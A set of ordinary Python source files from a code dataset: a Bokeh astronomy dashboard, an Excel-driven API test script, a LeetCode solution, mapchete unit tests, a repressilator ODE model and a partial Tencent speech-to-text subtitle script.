0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\n\np4 = figure(y_axis_label='com_dis', x_axis_label='com_g-r',tools=TOOLS)\np4.circle('com_x', 'com_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\n\np5 = figure(y_axis_label='qso_dis', x_axis_label='qso_r-i',tools=TOOLS)\np5.circle('qso_y', 'qso_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\n\np6 = figure(y_axis_label='com_dis', x_axis_label='com_r-i',tools=TOOLS)\np6.circle('com_y', 'com_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\n\np2.x_range = p1.x_range = p4.x_range = p3.x_range = Range1d(-1,3)\np6.x_range = p5.x_range = Range1d(-1,3)\np2.y_range = p1.y_range = Range1d(-0.6,3)\np4.y_range = p3.y_range = Range1d(-0.2,2)\np6.y_range = p5.y_range = Range1d(-0.2,2)\n\nplots = column(row(p1, p2),row(p3, p4),row(p5, p6))\n\np1.add_tools(hover)\np2.add_tools(hover)\np3.add_tools(hover)\np4.add_tools(hover)\np5.add_tools(hover)\np6.add_tools(hover)\n\nrange_slider = RangeSlider(start=0, end=24, value=(0,24), step=1, title='RA')\nrange_slider2 = RangeSlider(start=0, end=5, value=(0,5), step=0.1, title='Redshift')\nrange_slider3 = RangeSlider(start=0, end=4.2, value=(0,4.2), step=0.1, title='Sep(\")')\n\n# Create a dropdown Select widget: select\n#options1 = ['total','close','medium','medium2','far']\n#select1 = Select(title='Sep', options=options1, value='total')\n\noptions2 = ['all','wait','QSO','done','unclassified']\nselect2 = Select(title='status', options=options2, value='all')\n\n# Define a callback function: update_plot\ndef update_plot(attr, old, new):\n # Read the current value of the slider: scale\n time_zone = range_slider.value\n redshift = range_slider2.value\n Sep = range_slider3.value\n status = select2.value\n # Update source with the new data values\n RA_con = (sample['RA'] >= time_zone[0]*15) & (sample['RA'] <= time_zone[1]*15)\n z_con = (sample['Redshift'] >= redshift[0]) & (sample['Redshift'] <= redshift[1])\n Sep_con = (sample['Sep(\")'] >= Sep[0]) & (sample['Sep(\")'] <= Sep[1])\n if status == 'all':\n sta_con = 1\n else:\n sta_con = (sample['status'] == status)\n com_con = RA_con & z_con & Sep_con & sta_con\n qso_com.data = {\n 'No' : sample.loc[com_con].index,\n 'z' : sample['Redshift'],\n 'qso_y' : sample.loc[com_con, 'qso_r-i'],\n 'qso_x' : sample.loc[com_con, 'qso_g-r'],\n 'com_y' : sample.loc[com_con, 'com_r-i'],\n 'com_x' 
: sample.loc[com_con, 'com_g-r'],\n 'qso_dis' : sample.loc[com_con, 'qso_dis'],\n 'com_dis' : sample.loc[com_con, 'com_dis'],\n 'Sep' : sample.loc[com_con, 'Sep(\")'],\n 'ID' : sample.loc[com_con, 'ID'],\n 'imgs' : sample.loc[com_con, 'img'],\n 'status' : sample.loc[com_con, 'status']\n }\n\nslider = Slider(start=10, end=50, value=10, step=1, title=\"bins\")\nqso_arr_hist, qso_edges = np.histogram(sample['qso_dis'], \n bins = 10, \n range = [0, 1.6])\ncom_arr_hist, com_edges = np.histogram(sample['com_dis'], \n bins = 10, \n range = [0, 1.6])\ndis_hist_source = ColumnDataSource(data={\n 'qso_num' : qso_arr_hist,\n 'qso_left': qso_edges[:-1], \n 'qso_right': qso_edges[1:],\n 'com_num' : com_arr_hist,\n 'com_left': com_edges[:-1], \n 'com_right': com_edges[1:]})\ndef update_hist(attr, old, new):\n bins = slider.value\n qso_arr_hist, qso_edges = np.histogram(sample['qso_dis'], \n bins = bins, \n range = [0, 1.6])\n com_arr_hist, com_edges = np.histogram(sample['com_dis'], \n bins = bins, \n range = [0, 1.6])\n dis_hist_source.data = {\n 'qso_num' : qso_arr_hist,\n 'qso_left': qso_edges[:-1], \n 'qso_right': qso_edges[1:],\n 'com_num' : com_arr_hist,\n 'com_left': com_edges[:-1], \n 'com_right': com_edges[1:]\n }\n\np7 = figure(x_axis_label = 'qso_distance', y_axis_label = 'Numbers')\np7.quad(bottom=0, top='qso_num',left='qso_left', right='qso_right', source=dis_hist_source, fill_color='red', line_color='black') \np8 = figure(x_axis_label = 'com_distance', y_axis_label = 'Numbers')\np8.quad(bottom=0, top='com_num',left='com_left', right='com_right', source=dis_hist_source, fill_color='blue', line_color='black') \n\n# Attach the update_plot callback to the 'value' property of select\n#select1.on_change('value', update_plot)\nselect2.on_change('value', update_plot)\nrange_slider.on_change('value', update_plot)\nrange_slider2.on_change('value', update_plot)\nrange_slider3.on_change('value', update_plot)\nslider.on_change('value', update_hist)\n\n# Create layout and add to current document\nlayout = column(range_slider,range_slider2,range_slider3, select2, plots,slider,row(p7,p8))\n#show(layout)\ncurdoc().clear()\ncurdoc().add_root(layout)\nshow(p1)\n#cd \"path_to_the_script\"\n#bokeh serve --show bokeh_color.py\n\n\n\n","sub_path":"projects/2021_dual_AGN/Shenli_data/bokeh_color.py","file_name":"bokeh_color.py","file_ext":"py","file_size_in_byte":8964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516721226","text":"# -*- coding: utf-8 -*-\n# @Author : YaMeng\n# @File : lesson_7.py\n# @Software : PyCharm\n# @Time : 2021/3/4 9:34\n# @company : 湖南省零檬信息技术有限公司\n\n\n'''\n1、编写接口自动化的测试用例,读取excel里的测试数据 -- read_data()\n2、发送接口请求,得到响应结果 -- api_func()\n3、预期结果 vs 实际结果 -- done\n4、写入最终的结果到excel -- write_result()\n'''\n\nimport requests\nimport openpyxl\n# 读取数据\ndef read_data(filename, sheetname):\n wb = openpyxl.load_workbook(filename) # 加载工作簿\n sheet = wb[sheetname] # 获取sheet表单\n max_row = sheet.max_row # 获得excel最大的行数\n cases_list = [] # 定义一个空的列表用来存放测试用例\n for i in range(2, max_row+1): # +1 是因为取头不取尾\n dict_1 = dict(\n case_id = sheet.cell(row=i, column=1).value, # 用例编号\n url = sheet.cell(row=i, column=5).value, # 接口地址\n data = sheet.cell(row=i, column=6).value, # 请求参数\n excepted = sheet.cell(row=i, column=7).value) # 预期结果\n cases_list.append(dict_1) # 把字典一条一条的追加到列表里存储\n # print(cases_list)\n return cases_list\n\n# 发送请求\ndef api_func(url, data):\n header = {\"X-Lemonban-Media-Type\":\"lemonban.v2\",\"Content-Type\":\"application/json\"}\n res = 
requests.post(url=url,json=data,headers=header)\n    res_r = res.json()\n    return res_r\n\n# 写入结果\ndef write_result(filename, sheetname, row, column, final_res):\n    wb = openpyxl.load_workbook(filename) # 加载工作簿\n    sheet = wb[sheetname] # 获取sheet表单\n    sheet.cell(row=row, column=column).value = final_res # 写入结果\n    wb.save(filename) # 保存测试用例\n\n# 执行自动化脚本\ndef execute_func(filename, sheetname):\n    cases = read_data(filename, sheetname) # 调用读取函数\n    for case in cases: # 从读取函数里返回的数据进行取值\n        case_id = case['case_id'] # 取出用例编号\n        url = case.get('url') # 取出接口地址\n        data = case.get('data') # 取出请求参数\n        excepted = case.get('excepted') # 取出预期结果\n        data = eval(data) # 使用eval()函数进行类型转换 -->运行被字符串包裹的python表达式\n        excepted = eval(excepted) # 类型转换\n        excepted_msg = excepted.get('msg') # 取出预期结果里的msg去做结果判断\n        real_res = api_func(url=url, data=data) # 调用发送请求的接口\n        real_res_msg = real_res.get('msg') # 取出实际结果里的msg去做结果判断\n        print('实际结果为:{}'.format(real_res_msg))\n        print('预期结果为:{}'.format(excepted_msg))\n        if excepted_msg == real_res_msg:\n            print('这条测试用例通过!!')\n            final_res = 'pass' # 用变量来接收最终结果\n        else:\n            print('这条测试用例不通过!!!')\n            final_res = 'NG' # 用变量来接收最终结果\n        print('*' * 40)\n        write_result(filename, sheetname, case_id+1, 8, final_res) #调用回写函数\n\nexecute_func('test_case_api.xlsx', 'register')\nexecute_func('test_case_api.xlsx', 'login')\n\n\n\n\n","sub_path":"lesson_7.py","file_name":"lesson_7.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"358325779","text":"class Solution(object):\n\n    def lengthOfLongestSubstring(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        S = set(s)\n        if len(s) == len(S):\n            return len(s)\n\n        max_len = 0\n\n        for i in range(len(s)):\n            temp_s = s[i]\n            for j in range(i + 1, len(s)):\n                if temp_s.find(s[j]) == -1:\n                    temp_s += s[j]\n#                    if j == len(s) - 1:\n#                        temp.append(temp_s)\n                else:\n                    # temp.append(temp_s)\n                    break\n\n            if len(temp_s) > max_len:\n                max_len = len(temp_s)\n                if max_len == len(s) - i:\n                    return max_len\n\n        # print(temp)\n        return max_len\n\n\nif __name__ == '__main__':\n\n    s = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\n    sol = Solution()\n    length = sol.lengthOfLongestSubstring(s)\n    print(length)\n    pass\n","sub_path":"003-longest_substring_without_repeating/003_longest_substring_without_repeating[Time Limit Exceeded].py","file_name":"003_longest_substring_without_repeating[Time Limit Exceeded].py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"533898429","text":"#!/usr/bin/env python\n\"\"\"Test Mapchete main module and processing.\"\"\"\n\nimport os\nimport shutil\nimport yaml\nimport rasterio\nimport numpy as np\nimport numpy.ma as ma\nimport pkg_resources\nfrom cPickle import dumps\nfrom functools import partial\nfrom multiprocessing import Pool\n\nimport mapchete\nfrom mapchete.tile import BufferedTile\nfrom mapchete.io.raster import create_mosaic\nfrom mapchete.errors import MapcheteProcessOutputError\nfrom mapchete import _batch\n\nSCRIPTDIR = os.path.dirname(os.path.realpath(__file__))\nOUT_DIR = os.path.join(SCRIPTDIR, \"testdata/tmp\")\nTESTDATA_DIR = os.path.join(SCRIPTDIR, \"testdata\")\n\n\ndef test_empty_execute():\n    \"\"\"Execute process outside of defined zoom levels.\"\"\"\n    try:\n        with mapchete.open(\n            os.path.join(SCRIPTDIR, \"testdata/cleantopo_br.mapchete\")\n        ) as mp:\n            out_tile = mp.execute((6, 0, 0))\n            assert out_tile.data.mask.all()\n    finally:\n        shutil.rmtree(OUT_DIR, 
ignore_errors=True)\n\n\ndef test_read_existing_output():\n \"\"\"Read existing process output.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\")\n ) as mp:\n tile = (5, 0, 0)\n # process and save\n mp.write(mp.get_raw_output(tile))\n # read written data\n out_tile = mp.read(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_outside():\n \"\"\"Get raw process output outside of zoom levels.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_br.mapchete\")\n ) as mp:\n out_tile = mp.get_raw_output((6, 0, 0))\n assert out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_memory():\n \"\"\"Get raw process output using memory flag.\"\"\"\n try:\n with mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"memory\"\n ) as mp:\n assert mp.config.mode == \"memory\"\n out_tile = mp.get_raw_output((5, 0, 0))\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_readonly():\n \"\"\"Get raw process output using readonly flag.\"\"\"\n try:\n tile = (5, 0, 0)\n readonly_mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"readonly\")\n write_mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"),\n mode=\"continue\")\n\n # read non-existing data (returns empty)\n out_tile = readonly_mp.get_raw_output(tile)\n assert out_tile.data.mask.all()\n\n # try to process and save empty data\n try: # TODO\n readonly_mp.write(readonly_mp.get_raw_output(tile))\n raise Exception()\n except ValueError:\n pass\n\n # actually process and save\n write_mp.write(write_mp.get_raw_output(tile))\n\n # read written output\n out_tile = readonly_mp.get_raw_output(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_continue():\n \"\"\"Get raw process output using memory flag.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert mp.config.mode == \"continue\"\n tile = (5, 0, 0)\n # process and save\n mp.write(mp.get_raw_output(tile))\n # read written data\n out_tile = mp.get_raw_output(tile)\n assert not out_tile.data.mask.all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_get_raw_output_reproject():\n \"\"\"Get process output from a different CRS.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert mp.config.mode == \"continue\"\n # TODO implement function\n mp.get_raw_output((5, 0, 0))\n except NotImplementedError:\n pass\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels():\n \"\"\"Baselevel interpolation.\"\"\"\n try:\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"),\n mode=\"continue\"\n )\n # process data before getting baselevels\n mp.batch_process(quiet=True)\n\n # get tile from lower zoom level\n for t in mp.get_process_tiles(4):\n tile = mp.get_raw_output(t)\n assert not tile.data.mask.all()\n # write for next zoom level\n mp.write(tile)\n assert not mp.get_raw_output(tile.get_parent()).data.mask.all()\n\n # get tile from higher zoom level\n tile = mp.get_process_tiles(6).next()\n # process and save\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n 
assert any([\n not mp.get_raw_output(upper_tile).data.mask.all()\n for upper_tile in tile.get_children()\n ])\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels_buffer():\n \"\"\"Baselevel interpolation using buffers.\"\"\"\n try:\n with open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"), \"r\"\n ) as src:\n config = yaml.load(src.read())\n config.update(\n pixelbuffer=10, config_dir=os.path.join(SCRIPTDIR, \"testdata\")\n )\n mp = mapchete.open(config, mode=\"continue\")\n # get tile from lower zoom level\n lower_tile = mp.get_process_tiles(4).next()\n # process and save\n for tile in lower_tile.get_children():\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n out_tile = mp.get_raw_output(lower_tile)\n assert not out_tile.data.mask.all()\n\n # get tile from higher zoom level\n tile = mp.get_process_tiles(6).next()\n # process and save\n output = mp.get_raw_output(tile)\n mp.write(output)\n # read from baselevel\n assert any([\n not mp.get_raw_output(upper_tile).data.mask.all()\n for upper_tile in tile.get_children()\n ])\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_baselevels_buffer_antimeridian():\n \"\"\"Baselevel interpolation using buffers.\"\"\"\n try:\n mp_config = yaml.load(open(\n os.path.join(SCRIPTDIR, \"testdata/baselevels.mapchete\"),\n \"r\").read()\n )\n mp_config.update(\n pixelbuffer=10, config_dir=os.path.join(SCRIPTDIR, \"testdata\"),\n input_files=None\n )\n zoom = 5\n row = 0\n with mapchete.open(mp_config) as mp:\n # write data left and right of antimeridian\n west = mp.config.process_pyramid.tile(zoom, row, 0)\n shape = (3, ) + west.shape\n west.data = np.ones(shape) * 0\n mp.write(west)\n east = mp.config.process_pyramid.tile(\n zoom, row, mp.config.process_pyramid.matrix_width(zoom) - 1\n )\n east.data = np.ones(shape) * 10\n mp.write(east)\n # use baselevel generation to interpolate tile and somehow\n # assert no data from across the antimeridian is read.\n lower_tile = mp.get_raw_output(west.get_parent())\n assert np.where(lower_tile.data.data != 10, True, False).all()\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_processing():\n \"\"\"Test correct processing (read and write) outputs.\"\"\"\n for cleantopo_process in [\n \"testdata/cleantopo_tl.mapchete\", \"testdata/cleantopo_br.mapchete\"\n ]:\n mp = mapchete.open(os.path.join(SCRIPTDIR, cleantopo_process))\n for zoom in range(6):\n tiles = []\n for tile in mp.get_process_tiles(zoom):\n output = mp.execute(tile)\n tiles.append(output)\n assert isinstance(output, BufferedTile)\n assert isinstance(output.data, ma.MaskedArray)\n assert output.data.shape == output.shape\n assert not ma.all(output.data.mask)\n mp.write(output)\n mosaic, mosaic_affine = create_mosaic(tiles)\n try:\n temp_vrt = os.path.join(OUT_DIR, str(zoom)+\".vrt\")\n gdalbuildvrt = \"gdalbuildvrt %s %s/%s/*/*.tif > /dev/null\" % (\n temp_vrt, OUT_DIR, zoom)\n os.system(gdalbuildvrt)\n with rasterio.open(temp_vrt, \"r\") as testfile:\n for file_item, mosaic_item in zip(\n testfile.meta[\"transform\"], mosaic_affine\n ):\n assert file_item == mosaic_item\n band = testfile.read(1, masked=True)\n assert band.shape == mosaic.shape\n assert ma.allclose(band, mosaic)\n assert ma.allclose(band.mask, mosaic.mask)\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_processing_as_function():\n \"\"\"Test correct processing using execute function().\"\"\"\n for cleantopo_process in [\n 
\"testdata/cleantopo_tl.mapchete\", \"testdata/cleantopo_br.mapchete\"\n ]:\n mp_config = yaml.load(\n open(os.path.join(SCRIPTDIR, cleantopo_process)).read()\n )\n mp_config.update(\n process_file=\"../example_process_as_function.py\",\n config_dir=TESTDATA_DIR\n )\n mp = mapchete.open(mp_config)\n for zoom in range(6):\n tiles = []\n for tile in mp.get_process_tiles(zoom):\n output = mp.execute(tile)\n tiles.append(output)\n assert isinstance(output, BufferedTile)\n assert isinstance(output.data, ma.MaskedArray)\n assert output.data.shape == output.shape\n assert not ma.all(output.data.mask)\n mp.write(output)\n mosaic, mosaic_affine = create_mosaic(tiles)\n try:\n temp_vrt = os.path.join(OUT_DIR, str(zoom)+\".vrt\")\n gdalbuildvrt = \"gdalbuildvrt %s %s/%s/*/*.tif > /dev/null\" % (\n temp_vrt, OUT_DIR, zoom)\n os.system(gdalbuildvrt)\n with rasterio.open(temp_vrt, \"r\") as testfile:\n for file_item, mosaic_item in zip(\n testfile.meta[\"transform\"], mosaic_affine\n ):\n assert file_item == mosaic_item\n band = testfile.read(1, masked=True)\n assert band.shape == mosaic.shape\n assert ma.allclose(band, mosaic)\n assert ma.allclose(band.mask, mosaic.mask)\n finally:\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef test_multiprocessing():\n \"\"\"Test parallel tile processing.\"\"\"\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n assert dumps(mp)\n assert dumps(mp.config)\n assert dumps(mp.config.output)\n for tile in mp.get_process_tiles():\n assert dumps(tile)\n f = partial(_worker, mp)\n try:\n pool = Pool()\n for zoom in reversed(mp.config.zoom_levels):\n for raw_output in pool.imap_unordered(\n f, mp.get_process_tiles(zoom), chunksize=8\n ):\n mp.write(raw_output)\n except KeyboardInterrupt:\n pool.terminate()\n finally:\n pool.close()\n pool.join()\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n\n\ndef _worker(mp, tile):\n \"\"\"Multiprocessing worker processing a tile.\"\"\"\n return mp.execute(tile)\n\n\ndef test_write_empty():\n \"\"\"Test write function when passing an empty process_tile.\"\"\"\n mp = mapchete.open(\n os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n # process and save\n mp.write(mp.config.process_pyramid.tile(5, 0, 0))\n\n\ndef test_process_template():\n \"\"\"Template used to create an empty process.\"\"\"\n process_template = pkg_resources.resource_filename(\n \"mapchete.static\", \"process_template.py\")\n dummy1 = os.path.join(TESTDATA_DIR, \"dummy1.tif\")\n mp = mapchete.open(\n dict(\n process_file=process_template,\n input_files=dict(file1=dummy1),\n output=dict(\n format=\"GTiff\",\n path=\".\",\n type=\"geodetic\",\n bands=1,\n dtype=\"uint8\"\n ),\n config_dir=\".\",\n process_zoom=4\n ))\n process_tile = mp.get_process_tiles(zoom=4).next()\n # Mapchete throws a RuntimeError if process output is empty\n try:\n mp.execute(process_tile)\n raise Exception()\n except MapcheteProcessOutputError:\n pass\n\n\ndef test_count_tiles():\n \"\"\"Count tiles function.\"\"\"\n maxzoom = 13\n mp_conf = yaml.load(open(\n os.path.join(SCRIPTDIR, \"testdata/zoom.mapchete\"), \"r\").read()\n )\n del mp_conf[\"process_zoom\"]\n mp_conf.update(\n process_maxzoom=maxzoom,\n process_bounds=[14.0625, 47.8125, 16.875, 50.625],\n config_dir=TESTDATA_DIR, input_files=None, metatiling=8, pixelbuffer=5\n )\n # for minzoom in range(0, 14):\n for minzoom in range(0, 14):\n mp_conf.update(process_minzoom=minzoom)\n with mapchete.open(mp_conf) as mp:\n assert len(list(mp.get_process_tiles())) == _batch.count_tiles(\n 
mp.config.process_area(), mp.config.process_pyramid, minzoom,\n                maxzoom\n            )\n\n\ndef test_batch_process():\n    \"\"\"Test batch_process function.\"\"\"\n    mp = mapchete.open(\n        os.path.join(SCRIPTDIR, \"testdata/cleantopo_tl.mapchete\"))\n    try:\n        # invalid parameters errors\n        try:\n            mp.batch_process(zoom=1, tile=(1, 0, 0))\n            raise Exception()\n        except ValueError:\n            pass\n        try:\n            mp.batch_process(debug=True, quiet=True)\n            raise Exception()\n        except ValueError:\n            pass\n        # process single tile\n        mp.batch_process(tile=(2, 0, 0))\n        mp.batch_process(tile=(2, 0, 0), quiet=True)\n        mp.batch_process(tile=(2, 0, 0), debug=True)\n        # process using multiprocessing\n        mp.batch_process(zoom=2, multi=2)\n        # process without multiprocessing\n        mp.batch_process(zoom=2, multi=1)\n    finally:\n        shutil.rmtree(OUT_DIR, ignore_errors=True)\n","sub_path":"test/test_mapchete.py","file_name":"test_mapchete.py","file_ext":"py","file_size_in_byte":14740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"640761048","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nimport math\nimport sys\n\nprint(sys.argv)\n\ndef sdot(s,t,param):\n\n    (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI, m_GFP, p_GFP)=s\n    (k_m, k_m0, k_p, k_dm, k_dp, K, n, k_dGFP, IPTG)=param\n\n    rate_m_LacI_prod = k_m*K**n / (K**n + p_CI**n) + k_m0\n    if IPTG_method == 'None':\n        rate_m_TetR_prod = k_m*K**n / (K**n + p_LacI**n) + k_m0\n    if IPTG_method == 'multiply':\n        rate_m_TetR_prod = k_m*K**n / (K**n + p_LacI**n) * K**n/(K**n + IPTG) + k_m0\n    if IPTG_method == 'add':\n        rate_m_TetR_prod = k_m*K**n / (K**n + (p_LacI + IPTG)**n) + k_m0\n    rate_m_CI_prod = k_m*K**n / (K**n + p_TetR**n) + k_m0\n    rate_m_GFP_prod = 0\n\n    rate_p_LacI_prod = k_p*m_LacI\n    rate_p_TetR_prod = k_p*m_TetR\n    rate_p_CI_prod = k_p*m_CI\n    rate_p_GFP_prod = 0\n\n    rate_m_LacI_loss = k_dm*m_LacI\n    rate_m_TetR_loss = k_dm*m_TetR\n    rate_m_CI_loss = k_dm*m_CI\n    rate_m_GFP_loss = 0\n\n    rate_p_LacI_loss = k_dp*p_LacI\n    rate_p_TetR_loss = k_dp*p_TetR\n    rate_p_CI_loss = k_dp*p_CI\n    rate_p_GFP_loss = 0\n\n    dp_LacI = rate_p_LacI_prod - rate_p_LacI_loss\n    dp_TetR = rate_p_TetR_prod - rate_p_TetR_loss\n    dp_CI = rate_p_CI_prod - rate_p_CI_loss\n    dp_GFP = rate_p_GFP_prod - rate_p_GFP_loss\n\n\n    dm_LacI = rate_m_LacI_prod - rate_m_LacI_loss\n    dm_TetR = rate_m_TetR_prod - rate_m_TetR_loss\n    dm_CI = rate_m_CI_prod - rate_m_CI_loss\n    dm_GFP = rate_m_GFP_prod - rate_m_GFP_loss\n\n    sdot = (dp_LacI, dp_TetR, dp_CI, dm_LacI, dm_TetR, dm_CI, dm_GFP, dp_GFP)\n    return sdot\n\n# DEFINE INITIAL CONDITIONS AND PARAMETERS\n\n# initial conditions\np_LacI=0\np_TetR=0\np_CI=0\np_GFP=0\n\nm_LacI=5\nm_TetR=0\nm_CI=0\nm_GFP=0\n\ns = (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI)\n\nk_m=0.5\nk_m0=5e-4\n\nK=40.0\nn=2.1\n\nk_dm=0.00577622650467\nk_dp=0.00144405662617\nk_dGFP=0.000128360588993\nk_p=0.115524530093\nIPTG=0.1\nIPTG_method = 'None' # IPTG coupling used in sdot: 'None', 'multiply' or 'add'\n\ns0 = (p_LacI, p_TetR, p_CI, m_LacI, m_TetR, m_CI, m_GFP, p_GFP)\nparam = (k_m, k_m0, k_p, k_dm, k_dp, K, n, k_dGFP, IPTG)\n\nt_max=1000.*60.\nt_obs=np.linspace(0,t_max,t_max+1)\ns_obs=odeint(sdot,s0,t_obs,args=(param,))\n\np_LacI_obs = s_obs[:,0]\np_TetR_obs = s_obs[:,1]\np_CI_obs = s_obs[:,2]\nm_LacI_obs = s_obs[:,3]\nm_TetR_obs = s_obs[:,4]\nm_CI_obs = s_obs[:,5]\nm_GFP_obs = s_obs[:,6]\np_GFP_obs = s_obs[:,7]\n","sub_path":"tst3/repressilator.py","file_name":"repressilator.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"352857073","text":"# -*- coding: utf-8 -*-\r\nfrom tencentcloud.common import credential\r\nfrom tencentcloud.common.profile.client_profile import ClientProfile\r\nfrom tencentcloud.common.profile.http_profile import HttpProfile\r\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\r\nfrom tencentcloud.asr.v20190614 import asr_client, models\r\n\r\nfrom sys import argv\r\n\r\nimport base64\r\nimport json\r\nimport re\r\nimport jieba\r\n\r\njieba.enable_paddle()\r\n\r\nID = \"\"\r\nKEY = \"\"\r\n\r\n\r\nclass audio2text(object):\r\n\r\n def __init__(self):\r\n self.cred = credential.Credential(ID, KEY)\r\n self.httpProfile = HttpProfile()\r\n self.httpProfile.endpoint = \"asr.tencentcloudapi.com\"\r\n\r\n self.clientProfile = ClientProfile()\r\n self.clientProfile.httpProfile = self.httpProfile\r\n self.clientProfile.signMethod = \"TC3-HMAC-SHA256\" # 签名方法v3\r\n self.client = asr_client.AsrClient(self.cred, \"\", self.clientProfile)\r\n\r\n # 发送请求\r\n def a2t(self, audioFilePath):\r\n try:\r\n # 读取文件以及转base64\r\n audioFile = open(audioFilePath, mode='rb')\r\n data = audioFile.read()\r\n dataLen = len(data)\r\n base64Data = base64.b64encode(data).decode()\r\n\r\n req = models.CreateRecTaskRequest()\r\n params = {\"EngineModelType\": \"16k_zh_video\", \"ChannelNum\": 1, \"ResTextFormat\": 0, \"SourceType\": 1,\r\n \"Data\": base64Data, \"DataLen\": dataLen}\r\n req._deserialize(params)\r\n resp = self.client.CreateRecTask(req)\r\n resp = resp.to_json_string() # 转换为json格式\r\n\r\n resp = json.loads(resp) # 转换为字典,以便提取TaskId\r\n taskId = resp[\"Data\"][\"TaskId\"]\r\n\r\n return taskId\r\n\r\n except TencentCloudSDKException as err:\r\n print(err)\r\n\r\n # 查询结果\r\n def getText(self, taskId):\r\n try:\r\n req = models.DescribeTaskStatusRequest()\r\n params = '{\"TaskId\":' + str(taskId) + '}'\r\n req.from_json_string(params)\r\n\r\n resp = self.client.DescribeTaskStatus(req)\r\n # print(resp.to_json_string())\r\n\r\n return resp.to_json_string()\r\n\r\n except TencentCloudSDKException as err:\r\n print(err)\r\n\r\n\r\ndef formattime2time(ft):\r\n hh, mm, ss, xxx = re.split(':|,', ft)\r\n t = int(xxx) + int(ss) * 1000 + int(mm) * \\\r\n 1000 * 60 + int(hh) * 1000 * 60 * 60\r\n return t\r\n\r\n\r\ndef time2formattime(t):\r\n xxx = t % 1000\r\n t -= xxx\r\n ss = t % (1000 * 60)\r\n t -= ss\r\n mm = t % (1000 * 60 * 60)\r\n t -= mm\r\n hh = t % (1000 * 60 * 60 * 60)\r\n return \"%02d:%02d:%02d,%03d\" % (int(hh / (1000 * 60 * 60)), int(mm / (1000 * 60)), int(ss / 1000), xxx)\r\n\r\n# 将时间转为hh:mm:ss格式\r\ndef transToTime(strTime):\r\n time = strTime.split(\":\")\r\n hh = int(time[0]) if len(time) == 3 else 0\r\n mm = int(time[1]) if len(time) == 3 else (\r\n int(time[0]) if len(time) == 2 else 0)\r\n _ss = time[len(time) - 1].split(\".\")\r\n ss = int(_ss[0])\r\n ms = int(_ss[1])\r\n return \"%02d:%02d:%02d,%03d\" % (hh, mm, ss, ms)\r\n\r\n\r\n# 根据音频得到识别结果,处理并输出srt格式的中文字幕\r\ndef getZhSubtitle(audioPath, zhFilePath):\r\n # 发送识别请求\r\n testA2T = audio2text()\r\n myTaskId = testA2T.a2t(audioPath)\r\n myResult = ''\r\n cnt = 0\r\n # 查询识别结果\r\n while 1:\r\n if ++cnt % 1000000000 == 0:\r\n myText = json.loads(testA2T.getText(myTaskId))\r\n myStatus = myText[\"Data\"][\"Status\"]\r\n if myStatus == 2:\r\n myResult = myText[\"Data\"][\"Result\"]\r\n break\r\n\r\n res = myResult.split(\"\\n\")\r\n res.pop()\r\n # 按srt格式写入文档\r\n with open(zhFilePath, 'w+', encoding='utf-8') as newFile:\r\n step = 